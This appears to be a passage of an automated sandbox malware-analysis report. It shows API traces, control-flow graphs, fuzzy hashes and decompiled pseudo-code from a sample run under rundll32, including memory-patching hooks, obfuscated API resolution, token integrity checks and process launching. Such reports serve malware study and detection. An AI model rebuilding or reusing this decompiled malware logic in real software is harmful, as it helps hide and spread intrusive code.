                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04896B61
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04896B81
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04892E0E,?), ref: 04896B9C
                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04892E0E,?,00000000), ref: 04896C43
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04892E0E,?,00000000,?,?), ref: 04896C53
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04896C8D
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 04896CA7
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04896CB3
                                            • Part of subcall function 048967E2: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052493D8,00000000,?,76DDF710,00000000,76DDF730), ref: 04896831
                                            • Part of subcall function 048967E2: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05249410,?,00000000,30314549,00000014,004F0053,052493CC), ref: 048968CE
                                            • Part of subcall function 048967E2: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04896BB4), ref: 048968E0
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04892E0E,?,00000000,?,?), ref: 04896CC6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: 03ef32bb66409c7af55e335dd03ede7084c6709ca47505a5bc16255bbb0c84e1
                                          • Instruction ID: 806f706ac6967fdd0b915d5a4a9445023a1775aab221a5b4d12c61b2e7376e23
                                          • Opcode Fuzzy Hash: 03ef32bb66409c7af55e335dd03ede7084c6709ca47505a5bc16255bbb0c84e1
                                          • Instruction Fuzzy Hash: DD51AEB0508720BFDB10AF159C44DABBBE8EB84324F184F19F8A5E2250E775AD04CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 316 b6e376-b6e397 call b737a8 319 b6e39d-b6e39e 316->319 320 b6e479 316->320 321 b6e404-b6e40b 319->321 322 b6e3a0-b6e3a3 319->322 323 b6e47f-b6e48e VirtualProtect 320->323 324 b6e44c-b6e461 VirtualProtect 321->324 325 b6e40d-b6e414 321->325 326 b6e4d0-b6e4dc call b737e3 322->326 327 b6e3a9 322->327 328 b6e490-b6e4a6 VirtualProtect 323->328 329 b6e4ab-b6e4b1 GetLastError 323->329 324->323 331 b6e463-b6e477 324->331 325->324 330 b6e416-b6e422 325->330 332 b6e3af-b6e3b6 327->332 328->332 329->326 330->323 335 b6e424-b6e431 VirtualProtect 330->335 336 b6e448-b6e44a VirtualProtect 331->336 337 b6e3f8-b6e3ff 332->337 338 b6e3b8-b6e3bc 332->338 335->323 339 b6e433-b6e447 335->339 336->323 337->326 338->337 340 b6e3be-b6e3da lstrlen VirtualProtect 338->340 339->336 340->337 341 b6e3dc-b6e3f6 lstrcpy VirtualProtect 340->341 341->337
                                          APIs
                                          • lstrlen.KERNEL32(?,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3C4
                                          • VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3D6
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B6E3E5
                                          • VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3F6
                                          • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000400,00B75038,00000018,00B62C60,?,?,?,00000000,?,00B517D3,?,?), ref: 00B6E42D
                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,00000000,?,00B517D3,?,?,?,00000000,00000000), ref: 00B6E448
                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?,00B75038,00000018,00B62C60,?,?,?,00000000,?,00B517D3,?,?,?), ref: 00B6E45D
                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?,00B75038,00000018,00B62C60,?,?,?,00000000,?,00B517D3,?,?,?), ref: 00B6E48A
                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,00000000,?,00B517D3,?,?,?,00000000,00000000), ref: 00B6E4A4
                                          • GetLastError.KERNEL32(?,?,?,00000000,?,00B517D3,?,?,?,00000000,00000000), ref: 00B6E4AB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3676034644-0
                                          • Opcode ID: b0aa88422686077cfd8a2f2ba74d576814fa19735a7d26a3def60cf108151af3
                                          • Instruction ID: f5fae300378d74f340e5c5531c6bfeb7ac0f0230ff5f72a76eee95c0e9a88825
                                          • Opcode Fuzzy Hash: b0aa88422686077cfd8a2f2ba74d576814fa19735a7d26a3def60cf108151af3
                                          • Instruction Fuzzy Hash: 71414DB5900709EFDB219F64CC44E6EBBF9FB08350F008565E666A76A0DB38E805DF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E048915B9(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                          				void* _t17;
                                          				void* _t18;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t21;
                                          				intOrPtr _t24;
                                          				void* _t37;
                                          				void* _t41;
                                          				intOrPtr* _t45;
                                          
                                          				_t41 = __edi;
                                          				_t37 = __ebx;
                                          				_t45 = __eax;
                                          				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                          				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                          					E04893A6F(_t16, __ecx, 0xea60);
                                          				}
                                          				_t17 =  *(_t45 + 0x18);
                                          				_push(_t37);
                                          				_push(_t41);
                                          				if(_t17 != 0) {
                                          					InternetSetStatusCallback(_t17, 0);
                                          					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                          				}
                                          				_t18 =  *(_t45 + 0x14);
                                          				if(_t18 != 0) {
                                          					InternetSetStatusCallback(_t18, 0);
                                          					InternetCloseHandle( *(_t45 + 0x14));
                                          				}
                                          				_t19 =  *(_t45 + 0x10);
                                          				if(_t19 != 0) {
                                          					InternetSetStatusCallback(_t19, 0);
                                          					InternetCloseHandle( *(_t45 + 0x10));
                                          				}
                                          				_t20 =  *(_t45 + 0x1c);
                                          				if(_t20 != 0) {
                                          					FindCloseChangeNotification(_t20); // executed
                                          				}
                                          				_t21 =  *(_t45 + 0x20);
                                          				if(_t21 != 0) {
                                          					CloseHandle(_t21);
                                          				}
                                          				_t22 =  *((intOrPtr*)(_t45 + 8));
                                          				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                          					E04894C73(_t22);
                                          					 *((intOrPtr*)(_t45 + 8)) = 0;
                                          					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                          				}
                                          				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                          				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                          					E04894C73(_t23);
                                          				}
                                          				_t24 =  *_t45;
                                          				if(_t24 != 0) {
                                          					_t24 = E04894C73(_t24);
                                          				}
                                          				_t46 =  *((intOrPtr*)(_t45 + 4));
                                          				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                          					return E04894C73(_t46);
                                          				}
                                          				return _t24;
                                          			}

                                          APIs
                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 048915E7
                                          • InternetCloseHandle.WININET(?), ref: 048915EC
                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 048915F7
                                          • InternetCloseHandle.WININET(?), ref: 048915FC
                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 04891607
                                          • InternetCloseHandle.WININET(?), ref: 0489160C
                                          • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,048953E9,?,?,00000000,00000000,76DC81D0), ref: 0489161C
                                          • CloseHandle.KERNEL32(?,00000000,00000102,?,?,048953E9,?,?,00000000,00000000,76DC81D0), ref: 04891626
                                            • Part of subcall function 04893A6F: WaitForMultipleObjects.KERNEL32(00000002,04897B35,00000000,04897B35,?,?,?,04897B35,0000EA60), ref: 04893A8A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                          • String ID:
                                          • API String ID: 2172891992-0
                                          • Opcode ID: 52f0022135931a32f48528dcc2b3477f82ff7ce3c9e97688d07c5b27d2b0065e
                                          • Instruction ID: e7ae80fc570a5a739e0e3621b3aa113821fbae0abe0d362731a1cce13a6f8f43
                                          • Opcode Fuzzy Hash: 52f0022135931a32f48528dcc2b3477f82ff7ce3c9e97688d07c5b27d2b0065e
                                          • Instruction Fuzzy Hash: E2113D76A04E496BD931AEAAED88C0BB7EEEB4474435D0E19E046D3520CB74FD448B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 399 b67df1-b67e1f call b737a8 call b577c7 404 b67f54-b67f5b 399->404 405 b67e25-b67e36 call b5a0f2 399->405 406 b67f74-b67f80 call b737e3 404->406 410 b67f4c-b67f71 GetLastError 405->410 411 b67e3c-b67e65 call b650c5 405->411 410->406 411->406 416 b67e6b-b67e72 411->416 417 b67e74-b67e7b 416->417 418 b67ecf-b67ef8 VirtualProtect 416->418 417->418 419 b67e7d-b67e8c call b659d1 417->419 420 b67f03-b67f3d RtlEnterCriticalSection RtlLeaveCriticalSection call b65d9d 418->420 421 b67efa-b67efe call b6a8c8 418->421 419->418 428 b67e8e-b67e9c call b5a0f2 419->428 425 b67f42-b67f44 420->425 421->420 425->406 427 b67f46-b67f4a 425->427 427->406 428->418 431 b67e9e-b67eb6 428->431 432 b67ebf-b67ec9 VirtualProtect 431->432 433 b67eb8 431->433 432->418 433->432
                                          APIs
                                            • Part of subcall function 00B5A0F2: VirtualProtect.KERNEL32(00000000,00000000,00000040,00B51765,?,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A117
                                            • Part of subcall function 00B5A0F2: GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A11F
                                            • Part of subcall function 00B5A0F2: VirtualQuery.KERNEL32(00000000,?,0000001C,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A136
                                            • Part of subcall function 00B5A0F2: VirtualProtect.KERNEL32(00000000,00000000,-2C9B417C,00B51765,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A15B
                                          • GetLastError.KERNEL32(00000000,00000004,?,00000000,?,00000000,?,00B750A8,0000001C,00B6E844,00000002,00000000,00000001,?,?,?), ref: 00B67F4C
                                            • Part of subcall function 00B650C5: lstrlen.KERNEL32(?,?,?,?,00B51765), ref: 00B650FD
                                            • Part of subcall function 00B650C5: lstrcpy.KERNEL32(00000000,?), ref: 00B65114
                                            • Part of subcall function 00B650C5: StrChrA.SHLWAPI(00000000,0000002E,?,?,00B51765), ref: 00B6511D
                                            • Part of subcall function 00B650C5: GetModuleHandleA.KERNEL32(00000000,?,?,00B51765), ref: 00B6513B
                                          • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000000,00000000,?,00000000,00B51765,00000000,00000004,?,00000000,?), ref: 00B67EC9
                                          • VirtualProtect.KERNEL32(?,00000004,?,?,00000000,00B51765,00000000,00000004,?,00000000,?,00000000,?,00B750A8,0000001C,00B6E844), ref: 00B67EE4
                                          • RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B67F09
                                          • RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B67F27
                                            • Part of subcall function 00B5A0F2: SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A164
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                          • String ID:
                                          • API String ID: 899430048-3916222277
                                          • Opcode ID: 9d4f29bac60dc186a6b0de50e5b182ae43754e51370ac955d50a0f9ba5d986a8
                                          • Instruction ID: bdf1d791a6ebf01c49e9b3a15c77dd872ab4b700c965929d58c56bcd22e0a760
                                          • Opcode Fuzzy Hash: 9d4f29bac60dc186a6b0de50e5b182ae43754e51370ac955d50a0f9ba5d986a8
                                          • Instruction Fuzzy Hash: E6417C71840609EFDB10DF64D849AADBBF4FF08314F108299F929A7250CB38EA54CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 468 b63d88-b63dc7 call b644a5 VirtualAlloc 471 b63dcd-b63dd8 call b644a5 468->471 472 b63e98 468->472 477 b63ddd-b63de3 471->477 474 b63ea0-b63ea2 472->474 475 b63ea4-b63eac VirtualFree 474->475 476 b63eb2-b63ebd 474->476 475->476 478 b63de5-b63de9 477->478 479 b63e0b-b63e0d 477->479 478->479 480 b63deb-b63e09 VirtualFree VirtualAlloc 478->480 479->472 481 b63e13-b63e17 479->481 480->471 480->479 481->472 482 b63e19-b63e24 481->482 482->474 483 b63e26 482->483 484 b63e2c-b63e39 483->484 485 b63e75-b63e8f 484->485 486 b63e3b-b63e44 lstrcmpi 484->486 485->474 488 b63e91-b63e96 485->488 486->485 487 b63e46-b63e51 StrChrA 486->487 489 b63e53-b63e5f lstrcmpi 487->489 490 b63e61-b63e71 487->490 488->474 489->485 489->490 490->484 491 b63e73 490->491 491->474
                                          APIs
                                            • Part of subcall function 00B644A5: GetProcAddress.KERNEL32(?,00000318), ref: 00B644CA
                                            • Part of subcall function 00B644A5: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00B644E6
                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B63DC1
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B63EAC
                                            • Part of subcall function 00B644A5: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000100,00000200), ref: 00B64650
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00B63DF7
                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B63E03
                                          • lstrcmpi.KERNEL32(?,00000000), ref: 00B63E40
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 00B63E49
                                          • lstrcmpi.KERNEL32(?,00000000), ref: 00B63E5B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                          • String ID:
                                          • API String ID: 3901270786-0
                                          • Opcode ID: fcd79b7275bb368b10049305e50da8626345e0895d62ad53f04dcd591301691f
                                          • Instruction ID: 04c04d22f1076b2b36a06e1e812dd5fb4461d97c424acbba2f8d28585638ffc0
                                          • Opcode Fuzzy Hash: fcd79b7275bb368b10049305e50da8626345e0895d62ad53f04dcd591301691f
                                          • Instruction Fuzzy Hash: C3317E71504311ABD3218F11CC44B1BBBE8FF88B55F110959F98867290DB39EE44CBB6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 73%
                                          			E04892384(void* __eax, void* __ecx) {
                                          				long _v8;
                                          				char _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				long _v32;
                                          				void _v104;
                                          				char _v108;
                                          				long _t36;
                                          				intOrPtr _t40;
                                          				intOrPtr _t47;
                                          				intOrPtr _t50;
                                          				void* _t58;
                                          				void* _t68;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t71;
                                          
                                          				_t1 = __eax + 0x14; // 0x74183966
                                          				_t69 =  *_t1;
                                          				_t36 = E048974E0(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                                          				_v8 = _t36;
                                          				if(_t36 != 0) {
                                          					L12:
                                          					return _v8;
                                          				}
                                          				E0489799E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                          				_t40 = _v12(_v12);
                                          				_v8 = _t40;
                                          				if(_t40 == 0 && ( *0x489a300 & 0x00000001) != 0) {
                                          					_v32 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v108 = 0;
                                          					memset( &_v104, 0, 0x40);
                                          					_t47 =  *0x489a348; // 0x9ad5a8
                                          					_t18 = _t47 + 0x489b3e6; // 0x73797325
                                          					_t68 = E048950E8(_t18);
                                          					if(_t68 == 0) {
                                          						_v8 = 8;
                                          					} else {
                                          						_t50 =  *0x489a348; // 0x9ad5a8
                                          						_t19 = _t50 + 0x489b747; // 0x5248cef
                                          						_t20 = _t50 + 0x489b0af; // 0x4e52454b
                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                          						if(_t71 == 0) {
                                          							_v8 = 0x7f;
                                          						} else {
                                          							_v108 = 0x44;
                                          							E048937E9();
                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
                                          							_push(1);
                                          							E048937E9();
                                          							if(_t58 == 0) {
                                          								_v8 = GetLastError();
                                          							} else {
                                          								FindCloseChangeNotification(_v28); // executed
                                          								CloseHandle(_v32);
                                          							}
                                          						}
                                          						HeapFree( *0x489a2d8, 0, _t68);
                                          					}
                                          				}
                                          				_t70 = _v16;
                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                          				E04894C73(_t70);
                                          				goto L12;
                                          			}

                                          APIs
                                            • Part of subcall function 048974E0: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,048923A0,?,?,?,?,00000000,00000000), ref: 04897505
                                            • Part of subcall function 048974E0: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04897527
                                            • Part of subcall function 048974E0: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0489753D
                                            • Part of subcall function 048974E0: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04897553
                                            • Part of subcall function 048974E0: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04897569
                                            • Part of subcall function 048974E0: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0489757F
                                          • memset.NTDLL ref: 048923EE
                                            • Part of subcall function 048950E8: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04892407,73797325), ref: 048950F9
                                            • Part of subcall function 048950E8: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04895113
                                          • GetModuleHandleA.KERNEL32(4E52454B,05248CEF,73797325), ref: 04892424
                                          • GetProcAddress.KERNEL32(00000000), ref: 0489242B
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04892493
                                            • Part of subcall function 048937E9: GetProcAddress.KERNEL32(36776F57,04893ECD), ref: 04893804
                                          • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 04892470
                                          • CloseHandle.KERNEL32(?), ref: 04892475
                                          • GetLastError.KERNEL32(00000001), ref: 04892479
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                                          • String ID:
                                          • API String ID: 186216982-0
                                          • Opcode ID: 10ee7293f1b99329a614284096f75eb50e5f3acdb653b96ab8e9df53d05bada3
                                          • Instruction ID: 9c1d013ce8f5a087540c3cb4d66c66affca761cd794b839f4a98e99461726d03
                                          • Opcode Fuzzy Hash: 10ee7293f1b99329a614284096f75eb50e5f3acdb653b96ab8e9df53d05bada3
                                          • Instruction Fuzzy Hash: C8312EB2900A08BFDF10EFA8D888D9EBBFCEB08358F184E69E505E3111D775AD459B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B6CC5D: memset.NTDLL ref: 00B6CC67
                                          • OpenEventA.KERNEL32(00000002,00000000,00B79314,?,00000000,00000000,?,00B66085,?,?,?,?,?,?,?,00B5BF69), ref: 00B69038
                                          • SetEvent.KERNEL32(00000000,?,00B66085,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B69045
                                          • Sleep.KERNEL32(00000BB8,?,00B66085,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B69050
                                          • ResetEvent.KERNEL32(00000000,?,00B66085,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B69057
                                          • CloseHandle.KERNEL32(00000000,?,00B66085,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B6905E
                                          • GetShellWindow.USER32 ref: 00B69069
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00B69070
                                            • Part of subcall function 00B550FB: RegCloseKey.ADVAPI32(?,?,?), ref: 00B5517E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                          • String ID:
                                          • API String ID: 53838381-0
                                          • Opcode ID: e58ce78b34fb20fb26e9eb9f69f783029707ff8474a41e1b38875a4fba23090d
                                          • Instruction ID: 0eea9153bca712900ecd9b5ccbfb9beb66b7805f5ee39f61564abcf021cb4293
                                          • Opcode Fuzzy Hash: e58ce78b34fb20fb26e9eb9f69f783029707ff8474a41e1b38875a4fba23090d
                                          • Instruction Fuzzy Hash: ED21D732200610BBC62167A6AC4DE6B7BEDEFC9711F118049F61E931A1DF399C81CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04897628(long* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void _v16;
                                          				long _v20;
                                          				int _t33;
                                          				void* _t46;
                                          
                                          				_v16 = 1;
                                          				_v20 = 0x2000;
                                          				if( *0x489a2fc > 5) {
                                          					_v16 = 0;
                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                          						_v8 = 0;
                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                          						if(_v8 != 0) {
                                          							_t46 = E04894DF6(_v8);
                                          							if(_t46 != 0) {
                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                          								if(_t33 != 0) {
                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                          								}
                                          								E04894C73(_t46);
                                          							}
                                          						}
                                          						CloseHandle(_v12);
                                          					}
                                          				}
                                          				 *_a4 = _v20;
                                          				return _v16;
                                          			}

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0489765A
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 0489767A
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0489768A
                                          • CloseHandle.KERNEL32(00000000), ref: 048976DA
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 048976AD
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 048976B5
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 048976C5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 2e01ec1f5eedfe6bf50715ecd7a525f0d2bfb3e9f79a7e20c675fa42d3383ea5
                                          • Instruction ID: 706edd5288d87864aa51ba73e64dea65c4eb7e90c3ccb28d36416256bb2f10fa
                                          • Opcode Fuzzy Hash: 2e01ec1f5eedfe6bf50715ecd7a525f0d2bfb3e9f79a7e20c675fa42d3383ea5
                                          • Instruction Fuzzy Hash: 03215975900649FFEF01AF94CC84EEEBBB9EB48304F1405A5E910E6260CB755E54EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E04893739(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t9;
                                          				intOrPtr _t13;
                                          				char* _t19;
                                          				char* _t28;
                                          				void* _t33;
                                          				void* _t34;
                                          				char* _t36;
                                          				void* _t38;
                                          				intOrPtr* _t39;
                                          				char* _t40;
                                          				char* _t42;
                                          				char* _t43;
                                          
                                          				_t34 = __edx;
                                          				_push(__ecx);
                                          				_t9 =  *0x489a348; // 0x9ad5a8
                                          				_t1 = _t9 + 0x489b62c; // 0x253d7325
                                          				_t36 = 0;
                                          				_t28 = E0489403D(__ecx, _t1);
                                          				if(_t28 != 0) {
                                          					_t39 = __imp__;
                                          					_t13 =  *_t39(_t28, _t38);
                                          					_v8 = _t13;
                                          					_t40 = E04894DF6(_v8 +  *_t39(_a4) + 1);
                                          					if(_t40 != 0) {
                                          						strcpy(_t40, _t28);
                                          						_pop(_t33);
                                          						__imp__(_t40, _a4);
                                          						_t19 = E0489723B(_t33, _t34, _t40, _a8); // executed
                                          						_t36 = _t19;
                                          						E04894C73(_t40);
                                          						_t42 = E048920D2(StrTrimA(_t36, "="), _t36);
                                          						if(_t42 != 0) {
                                          							E04894C73(_t36);
                                          							_t36 = _t42;
                                          						}
                                          						_t43 = E048972E7(_t36, _t33);
                                          						if(_t43 != 0) {
                                          							E04894C73(_t36);
                                          							_t36 = _t43;
                                          						}
                                          					}
                                          					E04894C73(_t28);
                                          				}
                                          				return _t36;
                                          			}

                                          APIs
